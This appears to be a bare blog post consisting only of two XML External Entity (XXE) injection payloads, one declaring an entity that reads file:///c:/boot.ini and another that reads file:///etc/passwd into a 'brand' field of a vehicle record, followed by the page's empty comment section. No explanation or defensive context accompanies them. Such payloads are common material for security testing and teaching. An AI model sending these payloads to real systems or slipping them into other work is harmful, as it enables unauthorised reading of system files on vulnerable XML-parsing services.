<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<foo>&xxe;</foo><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><vehicle><type>Car</type><brand>&test;</brand></vehicle>
No comments:
Post a Comment